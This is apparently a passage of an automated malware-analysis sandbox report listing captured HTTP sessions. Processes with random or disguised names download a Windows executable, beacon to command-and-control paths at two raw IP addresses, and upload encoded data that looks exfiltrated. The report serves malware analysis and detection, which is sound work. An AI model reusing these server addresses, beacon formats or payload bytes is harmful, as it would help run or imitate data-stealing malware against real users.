00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 80 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 49 00 00 04 00 00 41 26 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUgI@IA&@\@p0A B@.rsrc0R@.idata @V@ @*PX@nywettin/Z@pnoojtlkpI,@.taggant0I"2@
Dec 8, 2024 19:53:36.606242895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:36.606256008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:36.606355906 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:36.606388092 CET	1236	IN	Data Raw: 14 f0 4d 22 c2 09 18 00 73 be a6 ff ef cb 16 3d eb 68 ef d6 73 40 ca 41 43 b9 4a 3c 28 11 97 82 7a 93 f7 2a 64 86 28 3b 8a 00 77 06 af ef 4f 3d 25 60 16 3c ec c0 d0 35 3f bc cb ab 91 7c 2e 5b 3b 0c c9 86 ab 09 13 76 b2 c5 2c 59 bd 98 9d 3a f3 87 Data Ascii: M"s=hs@ACJ<(zd(;wO=%`<5?\|.[;v,Y:'>__& b(s`;:}5"[~v:v{k?=q {u^7$eBs;vjurV~x!(Xjee'C}g^
Dec 8, 2024 19:53:36.606476068 CET	1236	IN	Data Raw: 05 24 cd 56 91 2a f7 e0 e4 b7 1e 8d 2e c0 1c e9 b7 86 9f 39 37 c8 1e af db 7d 4a 7a f2 d0 c9 e9 44 37 1f ad 9a 12 b0 61 c0 07 9e 5f 24 d9 ab 0a 77 5d 3b 79 bb e2 87 11 80 cf 64 49 f8 11 d8 41 6a 7d 86 7e ad b6 7a 1b 11 5f b7 32 33 81 a2 cc c4 b6 Data Ascii: $V.97}JzD7a_$w];ydIAj}~z_23Z]jw+^iv2<A{3`we\19I=A"iEJ4Ry;zkt\|W,&jXQl_w[d`X%gJE~ft5SaIEMq\nf
Dec 8, 2024 19:53:36.606488943 CET	1236	IN	Data Raw: 41 a4 86 8a dd ff 08 d7 37 19 11 40 d7 7b d1 8c 6b aa 0e d1 05 ca 8f 72 35 5f 77 de 25 13 b7 5b 30 a8 43 45 3e f4 88 7e 03 79 94 18 e7 c0 9c 8f 63 e6 c7 1a 6d f8 d5 bc 5e 75 1d b6 2d f1 c8 52 44 76 0a 22 34 40 e1 24 49 88 c6 61 35 38 f2 4b e2 86 Data Ascii: A7@{kr5_w%[0CE>~ycm^u-RDv"4@$Ia58K)#o*Lg@d<&kiz`!=xT&)JT1};Y1No5MJFq5^W~HYhzdw<\|%MeV2C#\q{vBh$@6
Dec 8, 2024 19:53:36.606503010 CET	1236	IN	Data Raw: 4c 9b 10 6d 71 e1 4e 3a a3 b3 f1 6b 9d b4 56 42 9d 34 72 8e a1 7c 04 fc 02 80 64 78 cb e3 05 a3 fb 96 35 a9 59 a7 df ad 80 02 53 ae 4b a6 53 c2 9e fb 9d 2c 0d 79 23 b0 95 60 fb 85 05 c7 b8 8c 92 47 f3 89 a4 ba 63 83 82 c6 b9 70 d3 b7 37 52 41 d6 Data Ascii: LmqN:kVB4r\|dx5YSKS,y#`Gcp7RAmh?z/L]or#.)3zXsF'"z`sxXhGP>vPDx/x&{{AArhcT?glkM3Ir7x%yIfe\|}Ftd>
Dec 8, 2024 19:53:36.606641054 CET	1236	IN	Data Raw: 95 40 2d 49 bf b5 76 a1 46 09 1b da 1e 94 91 c6 b2 bf a6 0c e7 bc ef 2a 30 80 9e 35 f6 88 89 b6 af 8b f1 62 96 4a 59 68 31 19 e1 37 2d 11 cd 50 33 1c d1 28 98 4c a5 4f 84 0d 0a da 39 16 30 dc a9 9e f0 d8 31 b6 59 36 87 4e aa 40 b2 dd 5a d3 d8 e5 Data Ascii: @-IvF*05bJYh17-P3(LO901Y6N@ZG`Bv#i[[d.voP.!eV#b5XviWm.BH~"Ajjx\|bq8@+/{"IN=5Rrb\|`z8eygPb?B{3{dd-
Dec 8, 2024 19:53:36.606654882 CET	1236	IN	Data Raw: 4d 0c 0b 9e 51 27 5c 90 66 c7 57 21 26 b7 c2 2e 35 59 f0 9a 96 ed 0e 62 a3 5d 85 91 a5 53 63 ac d6 0c 6b 32 f7 37 2c d1 95 eb 0c 04 74 7a be cd 4d 7c f4 b9 23 86 6f 21 74 b9 8c 45 23 64 1a d9 4c 5e 54 3e 2f ab c1 64 62 24 ea 62 5f 78 cb cb 5a 27 Data Ascii: MQ'\fW!&.5Yb]Sck27,tzM\|#o!tE#dL^T>/db$b_xZ'iO";x7rk_W>(Pby 2)EJ~#G'XsT.0`IfrZn;?7oFHp<:vyoY^tylas`)EEO9rli]wB
Dec 8, 2024 19:53:36.726003885 CET	1236	IN	Data Raw: 6a 30 4f 79 da 37 90 06 64 40 40 62 3f 31 96 69 ef 68 5c a3 f2 f4 39 b0 aa ee 26 f2 d2 ab ef 89 9c f9 41 49 62 eb 2f c2 a9 40 eb a8 f2 1c 1f 24 d9 7a ca 51 63 5f f6 98 4a e3 06 41 d0 af 67 c2 c1 c3 30 12 99 83 7b 49 ee d5 f0 d6 12 7b a3 e4 aa 3b Data Ascii: j0Oy7d@@b?1ih\9&AIb/@$zQc_JAg0{I{;tN&~P*\|1}v?a<k,vqK3e>7F$I-4k+tI'3a<.Q8furK_[+\|+9Z+vl~.c~Q`Z_LyGGxFMzHG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49847	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:36.426038980 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:53:36.785072088 CET	1072	OUT	Data Raw: 54 52 43 52 5f 5c 50 57 5c 5e 5b 53 52 5a 50 5b 56 52 54 5c 50 5f 54 40 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TRCR_\PW\^[SRZP[VRT\P_T@SVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%(<':?!6<?? [ *4&?8%'$R+49/;<!2'F.#]->
Dec 8, 2024 19:53:37.760582924 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:37.987411976 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49853	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:38.466878891 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:53:38.816306114 CET	1072	OUT	Data Raw: 51 5f 46 5e 5a 5c 55 53 5c 5e 5b 53 52 59 50 58 56 52 54 5d 50 59 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: Q_F^Z\US\^[SRYPXVRT]PYTESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&\(:^'9 %_+8X#;&'3'$(X#:/?']&'F.#]-2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49854	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:39.030652046 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:39.378935099 CET	1788	OUT	Data Raw: 54 59 46 5a 5a 5a 50 53 5c 5e 5b 53 52 58 50 59 56 53 54 59 50 5c 54 43 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TYFZZZPS\^[SRXPYVSTYP\TCSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&\(?%$)#56(<?8]#)(^&/?X'0T(]:<<@+2?%'F.#]-6
Dec 8, 2024 19:53:40.348336935 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:40.581140041 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 12 22 2b 3c 0f 36 3a 2e 0b 2c 38 25 02 3c 10 2a 5e 2e 16 21 1b 2b 33 3b 5c 3f 3c 27 06 3f 10 34 5d 24 55 36 57 23 31 23 1c 32 0e 20 5b 0d 1e 24 43 20 0d 24 0c 28 0d 32 02 2f 27 0b 00 26 3c 22 5e 36 3a 28 0b 24 05 36 00 2b 0c 3e 09 2b 33 20 57 24 17 24 1c 27 03 2b 10 3f 2b 21 57 0c 11 21 57 32 20 05 0e 35 0c 33 03 26 0c 23 56 35 43 29 09 28 23 39 01 27 3f 0e 03 3a 16 35 59 36 22 3c 1e 39 3b 3a 19 21 5b 20 08 29 03 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989"+<6:.,8%<*^.!+3;\?<'?4]$U6W#1#2 [$C $(2/'&<"^6:($6+>+3 W$$'+?+!W!W2 53&#V5C)(#9'?:5Y6"<9;:![ ).R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49855	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:39.220997095 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:39.566349983 CET	1072	OUT	Data Raw: 51 5f 43 5c 5f 5f 55 52 5c 5e 5b 53 52 5b 50 5a 56 5a 54 59 50 5d 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: Q_C\__UR\^[SR[PZVZTYP]TESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%+/6'Z!$(,4:81<;Z0'(=?[-$<!;X2<'F.#]-
Dec 8, 2024 19:53:40.540965080 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:40.778116941 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0
Dec 8, 2024 19:53:40.800090075 CET	433	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----jElpUrelodzVbMAk4gI6cyCq6l3k7WDGw0 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 119826 Expect: 100-continue
Dec 8, 2024 19:53:41.144642115 CET	13596	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6a 45 6c 70 55 72 65 6c 6f 64 7a 56 62 4d 41 6b 34 67 49 36 63 79 43 71 36 6c 33 6b 37 57 44 47 77 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------jElpUrelodzVbMAk4gI6cyCq6l3k7WDGw0Content-Disposition: form-data; name="0"Content-Type: text/plainTZF__XUP\^[SRYP_V[T]P[TFSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WV
Dec 8, 2024 19:53:41.231544971 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:41.344399929 CET	2472	OUT	Data Raw: 6a 70 69 49 2f 72 53 2b 34 52 43 6d 71 79 30 7a 74 36 63 4d 46 38 76 69 44 35 33 69 4d 2b 2f 31 4b 4d 4d 65 6c 64 6a 32 53 4f 75 31 31 54 67 74 2b 4c 78 77 78 55 48 4c 39 51 39 2b 55 53 50 4f 45 50 39 53 6f 64 79 6c 78 33 53 37 32 72 4f 33 77 55 Data Ascii: jpiI/rS+4RCmqy0zt6cMF8viD53iM+/1KMMeldj2SOu11Tgt+LxwxUHL9Q9+USPOEP9Sodylx3S72rO3wUlLfhBkpnp5jHxot1GmnX7rTNyb0HURspPFINyIfENvNXT2DsYK3xL4efE2BdgjgmrgThfXZ7k28ZTnPCWwPyg3Pa5rFVWw4kDEt6WpZaxFMWODiSYIXaUx/+SlrYNgheL+mPvAdqb1ZPels6dQs2/NT9P1hOSge6q
Dec 8, 2024 19:53:41.344429970 CET	2472	OUT	Data Raw: 71 42 42 37 53 70 31 46 31 37 42 4e 68 4f 34 6b 6a 67 71 69 76 43 67 65 73 50 52 6b 4d 6e 59 36 41 63 64 36 4f 6b 49 4c 6d 73 75 59 59 38 57 53 66 7a 48 78 30 65 4f 38 4e 50 35 46 44 6b 41 49 76 35 46 50 57 46 4e 76 52 55 51 64 6d 42 51 72 47 63 Data Ascii: qBB7Sp1F17BNhO4kjgqivCgesPRkMnY6Acd6OkILmsuYY8WSfzHx0eO8NP5FDkAIv5FPWFNvRUQdmBQrGcM5RGFBGFTkVR6EoAk1bMcLcjIH/iJ6RAanYi45WUCOmtmVDf52IGYo+cg518GrDexzn0Dyi3xypTEcHq6jUYj1z2UEqXeNq80skZcRIGJnsp3b6LhIG7p68RTAjL8IlCJG/CBTDMJkc/AX5dIvd9NjfwX1DwyFnST
Dec 8, 2024 19:53:41.344516993 CET	2472	OUT	Data Raw: 67 36 36 54 76 38 4d 54 73 38 75 74 52 38 44 72 39 70 74 4c 6a 72 49 65 54 49 6d 74 38 2f 57 46 79 63 31 76 56 70 36 36 35 50 65 37 4f 50 7a 47 74 31 61 39 37 5a 2f 2f 58 48 68 4f 64 61 7a 69 77 38 72 72 45 47 33 59 55 62 6a 33 45 6c 49 63 2b 56 Data Ascii: g66Tv8MTs8utR8Dr9ptLjrIeTImt8/WFyc1vVp665Pe7OPzGt1a97Z//XHhOdaziw8rrEG3YUbj3ElIc+VYqWHvuxi2G2w9+XL+tWZWS/KiwL0IrZF4T+JUsosNO81l4OAGF/HO50cg/9CrZMbTs+mRj/djfdyCFSzHiHD9zPl4Q/ftu6ZkeGl6yvBPE/uO9F36CzGP5568EXE8Niv+WGCfur1cQHfz1Mwpi4TLLIBir89Zw9/0
Dec 8, 2024 19:53:41.344578981 CET	2472	OUT	Data Raw: 71 48 62 77 75 50 47 75 51 54 38 50 57 33 2b 36 71 36 62 4c 6e 43 46 41 72 4e 67 58 57 30 4d 73 4c 5a 32 33 71 32 6a 2f 50 50 37 45 56 43 4f 78 64 52 76 77 6c 2f 65 79 6c 4f 6c 55 50 63 45 52 57 47 76 6c 58 5a 42 52 4c 46 47 39 2b 69 42 39 64 48 Data Ascii: qHbwuPGuQT8PW3+6q6bLnCFArNgXW0MsLZ23q2j/PP7EVCOxdRvwl/eylOlUPcERWGvlXZBRLFG9+iB9dHBZXtx4TtcSlpgodL/BL9Pkd5svn8R9wsklfzUhou8DWzOiu33N0T7PowlTzsrLsf26njIJAe4tEbXm2J+6oVNHbCj2fo1gN+VRA6GmR17eV9Nqd80FhQ6LybzENJ2KVDs4/iD6S4fmtd+7sI8n49NvDkdfLsMnPhx
Dec 8, 2024 19:53:41.344681025 CET	2472	OUT	Data Raw: 7a 70 4b 45 67 75 30 51 4c 6f 61 48 6e 5a 75 50 74 77 49 4f 2b 39 66 55 6d 56 48 53 35 61 47 6c 54 44 69 6a 55 6a 70 57 42 56 42 5a 59 30 59 54 77 38 37 57 56 49 6c 5a 59 51 62 69 77 42 6b 39 4d 5a 68 35 4a 32 33 37 6b 47 67 66 48 67 6e 58 6d 46 Data Ascii: zpKEgu0QLoaHnZuPtwIO+9fUmVHS5aGlTDijUjpWBVBZY0YTw87WVIlZYQbiwBk9MZh5J237kGgfHgnXmFHIwwFrsfJjrnKB7APFnMKMFWqmr7zUsi4RXX6ODtM0VsQobDqcyZvNUYC/7O7lqJb18xGMVerFyH2KlqUAjqH2FaMB8+ZRvZy1AZM3PSeB8/5/lb1G3wSncuQ/zB8NEOYW3PUtgM9KqTIESEhmOvqq7hwsk53qt3D
Dec 8, 2024 19:53:41.344712973 CET	4944	OUT	Data Raw: 4d 67 70 43 48 49 76 56 38 56 34 52 71 41 31 34 66 61 4f 32 41 74 72 44 31 78 75 6c 50 74 72 55 36 6c 41 79 75 62 42 6b 6d 6e 59 35 33 65 75 41 71 7a 62 57 6a 61 71 73 4e 6f 75 4c 59 31 78 35 5a 4e 52 2f 6f 46 59 72 4f 45 77 2b 74 6a 50 50 63 44 Data Ascii: MgpCHIvV8V4RqA14faO2AtrD1xulPtrU6lAyubBkmnY53euAqzbWjaqsNouLY1x5ZNR/oFYrOEw+tjPPcD48piwtYWep2LNvpX37ow+VdBaT+fpYEaLD/Ml3Z7b5Yx5SsPBdPwnzrM0uhdua8yUvX1qk8NCGWv+O7KpMv2JSVP6VUyn03b0gWtjgHtlOsVro1+U/+QF6dAVaauNjWMvorVqVGGVKjsKeHomPa4ETgzAOkA1ScK0
Dec 8, 2024 19:53:41.344810963 CET	4944	OUT	Data Raw: 6e 79 4a 63 74 64 51 30 79 56 7a 42 6c 63 52 31 30 6a 46 4a 6e 50 79 74 63 76 79 79 48 68 6d 30 4c 63 46 76 31 44 52 68 76 5a 4c 5a 72 61 4a 68 37 48 56 4c 38 71 57 6c 4e 6b 47 58 66 79 4e 4d 61 47 55 4e 55 42 37 5a 6b 45 75 64 6e 4c 4f 77 31 78 Data Ascii: nyJctdQ0yVzBlcR10jFJnPytcvyyHhm0LcFv1DRhvZLZraJh7HVL8qWlNkGXfyNMaGUNUB7ZkEudnLOw1xnMOM6/ppXiru67Mh4ks8yfWSL/INSZui4nb3pBpzxGqsiAt6FchJ+Kpy2IK+qFV4TrSJHxi3lOijGL8W8M1Q90nnc6PxYpc5ItpGIYi3ETQXlMGnhb/b25NM9fEY3RsBWgmddek2rxGZ1Ihb1Xr45KGtgUyq9wtBR
Dec 8, 2024 19:53:41.344858885 CET	4944	OUT	Data Raw: 42 54 42 6f 6d 50 58 76 48 70 75 34 64 30 61 78 44 45 2f 6a 6e 57 73 7a 30 67 32 30 49 5a 7a 48 6e 39 52 4b 4d 74 44 43 44 51 36 36 65 79 4a 4b 31 78 65 59 32 44 4f 7a 52 48 64 76 7a 53 43 6b 49 65 6d 61 46 71 57 6c 4e 44 4f 53 57 61 79 77 66 49 Data Ascii: BTBomPXvHpu4d0axDE/jnWsz0g20IZzHn9RKMtDCDQ66eyJK1xeY2DOzRHdvzSCkIemaFqWlNDOSWaywfIjud2b7VlBl9wDK5i0wGogL83TJepi3NDNwiF4rUSyrn4H1aGTDTjbXChQbhwE/KEC1wBsw2VybR1CEwE0ZVKsmnDH/UrMo0khg5hKOrZ9APddUXrlWNnMUgbM7ia8wysdZ+WGiv2WVEV8p51foStzKPln6c+s6m1y
Dec 8, 2024 19:53:42.205615044 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49861	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:41.063664913 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:53:41.410243988 CET	1072	OUT	Data Raw: 54 59 43 5d 5a 5c 50 53 5c 5e 5b 53 52 54 50 51 56 53 54 57 50 5f 54 44 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TYC]Z\PS\^[SRTPQVSTWP_TDSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%*<!39/X &$(?4: %,$'8<\9+([1'F.#]-
Dec 8, 2024 19:53:42.402415037 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:42.637190104 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49863	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:42.438652039 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013249001&unit=246122658369
Dec 8, 2024 19:53:43.783849955 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49869	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:42.909553051 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
